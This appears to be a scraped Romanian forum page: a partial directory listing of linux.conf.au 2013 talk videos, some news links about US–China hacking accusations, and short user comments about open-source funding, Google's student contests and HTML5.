right]03-Feb-2013 17:14 [/TD] [TD=align: right]151M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Stereographic_film_making_and_Linux.mp4[/TD] [TD=align: right]02-Feb-2013 23:09 [/TD] [TD=align: right] 86M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Systems_Administration_Server_and_Process_Behavior.mp4[/TD] [TD=align: right]03-Feb-2013 01:08 [/TD] [TD=align: right]282M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Teaching_Robotics_and_Embedded_Computing_with_Legos_and_Arduino.mp4[/TD] [TD=align: right]02-Feb-2013 19:25 [/TD] [TD=align: right] 41M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Teaching_the_X_server_new_tricks.mp4[/TD] [TD=align: right]04-Feb-2013 09:38 [/TD] [TD=align: right]102M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_IPocalypse_20_months_later.mp4[/TD] [TD=align: right]02-Feb-2013 19:25 [/TD] [TD=align: right]177K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_Perl_Renaissance.mp4[/TD] [TD=align: right]02-Feb-2013 20:17 [/TD] [TD=align: right] 59M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_Raspberry_Pi_and_Linux.mp4[/TD] [TD=align: right]02-Feb-2013 21:45 [/TD] [TD=align: right]159M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_future_of_nonvolatile_memory.mp4[/TD] [TD=align: right]02-Feb-2013 19:24 [/TD] [TD=align: right] 49M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_real_story_behind_Wayland_and_X.mp4[/TD] [TD=align: right]03-Feb-2013 15:51 [/TD] [TD=align: right] 68M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Theres_a_Party_In_Your_Box_And_Everyones_Invited.mp4[/TD] [TD=align: right]02-Feb-2013 21:21 [/TD] [TD=align: right] 47M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Think_Create_Critique_Design.mp4[/TD] [TD=align: right]02-Feb-2013 23:18 [/TD] [TD=align: right] 78M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Touch_and_Go_Modern_User_Interfaces_with_Open_Source.mp4[/TD] [TD=align: right]02-Feb-2013 23:18 [/TD] [TD=align: right]121M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Transcendent_Memory_Not_Just_for_Virtualization_Anymore.mp4[/TD] [TD=align: right]03-Feb-2013 18:40 [/TD] [TD=align: right]118M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Trinity_A_Linux_kernel_fuzz_tester_and_then_some.mp4[/TD] [TD=align: right]03-Feb-2013 00:37 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Two_years_of_LibreOffice.mp4[/TD] [TD=align: right]03-Feb-2013 00:48 [/TD] [TD=align: right]109M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]UEFI_the_Converged_Firmware_Infrastructure.mp4[/TD] [TD=align: right]02-Feb-2013 21:48 [/TD] [TD=align: right] 95M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Using_Puppet_to_Model_Application_clusters.mp4[/TD] [TD=align: right]04-Feb-2013 10:23 [/TD] [TD=align: right]101M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Using_open_source_in_over_1100_schools_in_New_Zealand.mp4[/TD] [TD=align: right]02-Feb-2013 21:49 [/TD] [TD=align: right]1.8M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Vampire_Mice_How_USB_PM_impacts_you.mp4[/TD] [TD=align: right]02-Feb-2013 23:03 [/TD] [TD=align: right]121M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Why_kernel_space_sucks.mp4[/TD] [TD=align: right]03-Feb-2013 15:51 [/TD] [TD=align: right] 63M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Wiggle_while_you_work.mp4[/TD] [TD=align: right]03-Feb-2013 13:48 [/TD] [TD=align: right] 92M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]gitannex.mp4[/TD] [TD=align: right]03-Feb-2013 18:29 [/TD] [TD=align: right] 61M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]redgrep_from_regular_expression_derivatives_to_LLVM.mp4[/TD] [TD=align: right]02-Feb-2013 18:58 [/TD] [TD=align: right] 60M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]users_delighted_better_UX_using_CSS_3_in_particular_and_HTML5_in_general.mp4[/TD] [TD=align: right]03-Feb-2013 14:37 [/TD] [TD=align: right] 94M[/TD] [TD] [/TD] [/TR] [TR] [TH=colspan: 5] [/TH][/TR] [/TABLE] Sursa: Index of /linux.conf.au/2013/mp4

Chinese experts slam U.S. hacking accusations - People's Daily Online US military advisor calls for McKinnon pardon, recruitment of "master hackers" • The Register https://www.computerworld.com/s/article/9236535/President_can_order_preemptive_cyberattacks_if_needed 'Chinese still hacking us,' says Wall Street Journal owner | Security & Privacy - CNET News

Da, ai dreptate, munca pe bani putini. Dar sa nu uitam ca open-source nu inseamna lipsa unei finantari. Companiile mari care fac practic bani de pe urma proiectelor open-source platesc oameni sa lucreze la aceste proiecte. Un exemplu ar fi Intel si un exemplu de proiect e chiar kernelul de Linux. Daca procesoarele lor nu ar functiona pe Linux ar fi nasol, deci investesc in programatori de kernel. Cam asa e si cu alte proiecte, se mai adauga donatii in unele cazuri sau sponsorizari, cum e cazul OpenSSL care asteapta sponsorizari de 50K dolari. Dar daca suntem atenti, ne dam seama ca ofera suport FIPS, certificare care costa cam 50K dolari. Ce poate fi util pentru acesti tineri pe langa faptul ca invata multe lucruri noi si utile e faptul ca ajung sa lucreze la companii mari gen Google care ii vor trata bine.

Uuu, shit just got serious... Avem cele doua tabere: 1. Chinezii cu vorba aia: Cum sparg chinezii o parola? Incearca fiecare cate una. Adica sunt multi -> potential 2. Americanii care sunt baieti cu bani si pot plati niste indieni cu 2 dolari pe an sa le faca treburile murdare Pe cine pariati?

De pe Jurnalul, aceeasi stire: "Cei 334 de elevi participanti din 36 de ??ri au trebuit sa rezolve 1925 de diferite teme si sarcini propuse de organizatiile open source" "Cei 20 au rezolvat 576 de teme anun?? Google Open Source" Aparent el a lucrat la BRL-CAD | Open Source Solid Modeling . Sunt curios daca aceste initiative sunt ok, sau companiile doar pun niste copii sa le faca treaba Se pare ca alte proiecte pe acolo au mai fost Fedora, NetBSD, KDE si Haiku. Interesant.

Vine HTML 5 si nu mai e nevoie nici de Java nici de Flash.

Da, frumos articol